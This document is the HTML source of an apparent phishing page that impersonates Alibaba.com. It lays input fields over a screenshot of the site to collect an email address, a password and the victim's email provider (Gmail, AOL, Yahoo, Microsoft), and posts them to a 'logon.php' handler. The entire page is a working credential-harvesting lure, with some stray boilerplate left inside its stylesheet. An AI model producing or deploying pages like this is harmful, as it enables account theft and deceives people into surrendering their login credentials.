<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- saved from url=(0014)about:internet -used for VM preview mode only -->
<html> 

<head> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Manufacturers,Suppliers,Exporters & Importerts from the world's largest online B2B marketplace-Alibaba.com</title>
<meta name="generator" content="Virtual Mechanics SiteSpinner 2.92g - Trial Only">
<meta http-equiv="imagetoolbar" content="false">

<style type="text/css">
<!--
body {
  margin: 0;
  height: 100%;
  width: 100%;
  background-color: #ffffff;
}
img {
  border-width: 0;
  vertical-align: top;
}
form#Oform3 {
  visibility: visible;
  margin: 0px;
  font-size: 10px;
}
.dfltf  {
  position: absolute;
  color: #000000;
  font-family: 'Times New Roman';
  font-size: 12px;
  font-weight: normal;
  font-style: normal;
  text-decoration: none;
        top: 95px;
        left: 509px;
        height: 16px;
        width: 255px;
    }
#Oobj1 {
  position: absolute;
  font-size: 10px;
  z-index: 1;
  left: -0.20em;
  top: -0.10em;
  width: 136.60em;
  height: 76.8em;
}
img#Ggeo1 {
  width: 100%;
  height: 100%;
}
#Oobj3 {
  position: absolute;
  font-size: 10px;
  z-index: 2;
  left: 57.8em;
  top: 29.6em;
  width: 42em;
  height: 2.20em;
        right: 110px;
    }
    <select>
  <option value="volvo">Volvo</option>
  <option value="saab">Saab</option>
  <option value="mercedes">Mercedes</option>
  <option value="audi">Audi</option>
</select>

#Gform1 {
    border: 0 none #b4b4b4;
        width: 84%;
        height: 109%;
        top: 19px;
        left: 785px;
        margin-top: 0px;
    }
#Oobj5 {
  position: absolute;
  font-size: 10px;
  z-index: 3;
  left: 31.2em;
  top: 15.2em;
  width: 9.00em;
  height: 2.90em;
}
#Gform4 {
    border: 0 none #b4b4b4;
width: 44%;
  height: 218%;
        background-color:#ffffff;      background-image: url('2013-12-28_004957.png');
        top: 248px;
        left: 73px;
    }

#Gform2 {
    border: 0 none #b4b4b4;
        width: 37%;
        height: 100%;
        top: -8px;
        left: -1px;
    }
#Gform3 {
    border: 0 none #b4b4b4;
        width: 101%;
        height: 100%;
        top: 47px;
        left: -3px;
    }

#Gform5 {
    border: 0 none #b4b4b4;
        width: 60%;
        height: 136%;
        top: 101px;
        left: 7px;
        margin-top: 0px;
    }

#Gform6 {
    border: 0 none #b4b4b4;
        width: 60%;
        height: 136%;
        top: 43px;
        left: 6px;
        margin-top: 0px;
    }

-->
</style>
<script language="javascript" type="text/javascript">
// <!CDATA[

function Gform4_onclick() {

}

function Gform5_onclick() {

}

// ]]>


</script>
</head> 

<body>

<div id="Oobj1">
<img id="Ggeo1" src="page1.png" alt="">
</div>

<form id="Oform3" name="form3" action="logon.php" method="POST" enctype="application/x-www-form-urlencoded">
<div id="Oobj3">
    <input type="submit" id="Gform4" class="dfltf" name="form6" 
        value="" src="btun.png" style="background-image: url('btun.png')"><input 
        type="text" id="Gform6" class="dfltf" name="email" value="" 
        ><input 
        type="password" id="Gform5" class="dfltf" name="pass" value="" 
 >&nbsp;
        
        <select name="select" style="width: 252px">
  <option value="Gmail">Gmail</option>
  <option value="Aol">Aol</option>
  <option value="Yahoo">Yahoo!</option>
  <option value="Microsoft">^microsoft</option>
    <option value="Other">Other!</option>
</select>



</div></form>


</body> 

<head>	<!--used for VM preview mode only -->
	<meta http-equiv="Expires" content="-1">
</head>	<!--used for VM preview mode only -->
</html> 
